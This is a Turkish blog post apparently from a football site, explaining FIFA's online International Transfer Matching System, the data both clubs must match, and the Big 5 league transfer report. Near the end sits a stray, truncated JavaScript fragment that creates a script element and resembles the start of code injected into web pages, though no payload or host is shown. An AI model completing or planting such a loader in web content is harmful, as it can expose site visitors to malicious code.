FIFA ve Transfer Sistemi

generic

İster dünya starı bir oyuncu olun ister dünyanın herhangi bir ülkesinde alt liglerde oynayan bir futbolcu olun. Bu, transfer sürecinde FIFA tarafından belirlenen prosedüre uyma zorunluluğunuz ortadan kaldırmaz. Öte yandan transfer döneminde zaman, transfer yapma uğraşında olan kulüpler için çok daha hızlı akar. Kulüp yöneticileri transfer döneminin sonlarına yaklaşıldığında n son dakika transferlerinin evraklar ve benzeri resmi işleriyle uğraşırken saatler hızla akıp gider.

Ancak bu telaş sadece kulüp yöneticileri için geçerli değildir. Aynı zamanda FIFA’nın Zürih’teki transfer eşleşme sistemi merkezinde (TMS) de bu son saatler oldukça yoğun geçiyor.

Örneğin bu yaz transfer döneminin son gününde toplam 295 futbolcu kulüp değiştirdi.

transfers-48203

Peki nedir bu TMS ya da ITMS?

Orijinal açılımı “International Transfer Matching System” olan ve Türkçemize de “Uluslararası Transfer Eşleşme Sistemi” olarak çevirlebileceğimiz bu sistemi, kulüplerin transfer işlemlerinde FIFA kurallarına uymasının sağlandığı ve aynı zamanda anlık takip sistemi ile transfer döneminin çok daha şeffaf hale getirildiği bir online sistem olarak tanımlayabiliriz. Kulüplerin gerekli dosyaları posta veya fax yolu ile FIFA’ya ilettiği günler geride kaldı diyebiliriz. Bu tip mekanik araç-gereçlerde anlık olarak meydana gelebilecek problemlerin transfer süreçlerine olan negatif etkileri de bu şekilde ortadan kaldırıldı. Aynı zamanda transferlerin onaylanma süreci de dolayısıyla çok daha kısaldı ve kolay bir hal aldı. Öyle ki FIFA Satış ve Pazarlama Müdürü Vira Egli, 10 dakikadan daha az bir sürede tamamlanan transfer işlemlerinin olduğunu belirtiyor. Bu gerçekten eski usül transfer işlemlerine bakıldığında inanılmaz bir gelişme. Yani iki kulübün anlaşma sağladığı bir oyuncunun transferi sadece bir kaç tık ötede. İlk olarak 2007 yılında bir proje olarak ortaya konulan bu sistem 2010 yılının Ekim ayından beri yürürlükte. 209 FIFA üyesi federasyonun da kullanmak zorunda olduğu platform için her federasyonun bu sistemi kullanmayı bilen bir menajeri var ve dünya genelinde 6.500’den fazla kulüp bu sistemi kullanmakta.

Uluslararası Transfer Sertifikası

Eğer herhangi bir A kulübü ile B kulübü arasında uluslararası anlamda bir transfer gerçekleşecekse, iki kulüp de sisteme doğru bilgileri girmek zorunda. Transfer ücreti, menajer payı ve oyuncunun alacağı ücret gibi bilgiler sistemde eşleşirse bu transfere FIFA tarafından yeşil ışık verilir.

A KULÜBÜ                                      B KULÜBÜ  

Kulüp adı                                               Kulüp adı
Bağlı olduğu federasyon                   Bağlı olduğu federasyon
Oyuncu bilgileri                                Oyuncu bilgileri
Transfer tipi                                       Transfer tipi
Kulüp menajeri                                  Kulüp menajeri
Ödeme şekli                                       Ödeme şekli
Transfer ücreti                                   Transfer ücreti

5 Büyükler Raporu

Az önce de belirttiğim gibi bu sistemin getirilerinden biri de tüm süreci şeffaf hale getirmesi ve bu sayede de çeşitli istatistiki bilgilere ulaşılabilmesi. Her transfer döneminin sonunda yayınlanan bu rapor Avrupanın en büyük beş ligi olarak kabul edilen İngiltere, Fransa, İtalya, Almanya ve İspanya liglerinde gerçekleşen transferlerden oluşuyor.

fa (1)

Kaynak: Fifa Weekly

 var d=document;var s=d.createElement(‘script’);

adet yorum. Siz de yorumunuzu aşağı yazabilirsiniz.

Yazar: Futbol Akademi

info@futbolakademi.net

Paylaş